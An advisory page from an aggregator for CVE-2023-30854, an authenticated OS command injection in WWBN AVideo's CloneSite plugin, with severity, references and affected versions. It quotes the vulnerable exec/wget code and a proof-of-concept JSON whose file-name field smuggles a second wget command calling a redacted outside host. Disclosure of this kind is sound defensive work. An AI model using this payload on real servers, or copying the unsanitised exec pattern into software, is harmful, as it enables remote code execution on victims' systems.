Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS02dnJqLXBoMjctcWZwM84AAzAX
Remote code injection in wwbn/avideo
WWBN Avideo Authenticated RCE - OS Command Injection
Description
An OS Command Injection vulnerability in an Authenticated endpoint /plugin/CloneSite/cloneClient.json.php
allows attackers to achieve Remote Code Execution.
Vulnerable code:
$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}";
$log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file");
exec($cmd . " 2>&1", $output, $return_val);
We can control $objClone->cloneSiteURL
through the admin panel clone site feature.
/plugin/CloneSite/cloneClient.json.php
sends a GET Request to {$objClone->cloneSiteURL}/plugin/CloneSite/cloneServer.json.php
. I hosted a specially crafted cloneServer.json.php
that prints the following JSON data
{"error":false,"msg":"","url":"https:\/\/REDACTED/\/","key":"REDACTED","useRsync":1,"videosDir":"\/var\/www\/html\/[demo.avideo.com](http://demo.avideo.com/)\/videos\/","sqlFile":"Clone_mysqlDump_644ab263e62d6.sql; wget [http://REDACTED:4444/`pwd`](http://redacted:4444/pwd) ;#","videoFiles":[],"photoFiles":[]}
Send a GET Request to /plugin/CloneSite/cloneClient.json.php
then remote code execution is achieved.
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02dnJqLXBoMjctcWZwM84AAzAX
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 12 months ago
Updated: 6 months ago
CVSS Score: 8.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Identifiers: GHSA-6vrj-ph27-qfp3, CVE-2023-30854
References:
- https://github.com/WWBN/AVideo/security/advisories/GHSA-6vrj-ph27-qfp3
- https://github.com/WWBN/AVideo/commit/020415d22f36d93ed865eb61994b49caa0f7f90a
- https://nvd.nist.gov/vuln/detail/CVE-2023-30854
- https://github.com/advisories/GHSA-6vrj-ph27-qfp3
Blast Radius: 1.0
Affected Packages
packagist:wwbn/avideo
Dependent packages: 0Dependent repositories: 0
Downloads: 11 total
Affected Version Ranges: < 12.4
Fixed in: 12.4
All affected versions: 11.1.1
All unaffected versions: